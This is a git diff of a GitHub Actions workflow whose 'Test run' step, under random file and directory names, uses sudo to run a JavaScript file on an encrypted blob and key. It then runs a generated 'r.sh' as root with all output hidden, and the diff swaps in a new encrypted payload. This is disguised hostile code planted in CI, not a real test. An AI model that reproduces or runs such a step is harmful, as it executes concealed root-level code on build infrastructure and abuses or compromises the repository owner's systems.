--- a/.github/workflows/uecyp.yml
+++ b/.github/workflows/uecyp.yml
@@ -29,6 +29,6 @@ jobs:
     - name: Test run
       run: |
         cd ${{ github.workspace }}
-        echo '2yw5x'
+        echo 'qla84'
         sudo chmod +x johns2xqp/field806dx/piersonteqsh/rubiox050l.js
-        sudo ./johns2xqp/field806dx/piersonteqsh/rubiox050l.js U2FsdGVkX19bdmCk45LxFbsEzH2Jt/9aEZ2tuuaBZUYHrBQ7eCgcfCNSdMooUB9gQvV0dF2wU3/wei+Ju99BlO+mSgRJkpLIGwPoSj4BW/TZ8V3RuUq02Sku4h+Mi3k8 xme479 && sudo sh r.sh > /dev/null 2>&1
+        sudo ./johns2xqp/field806dx/piersonteqsh/rubiox050l.js U2FsdGVkX18j41+TL3K8q19zJGwkQ53lswgy+PXyVSrwXaNFL9z//gFLy7ayDQ1y2WmcTgp7y4je2ObZNEYcKT1bGkevZJOwKyJT1MacBwlY2zcDm2QAwC85nLnPaqT/ zql73k && sudo sh r.sh > /dev/null 2>&1
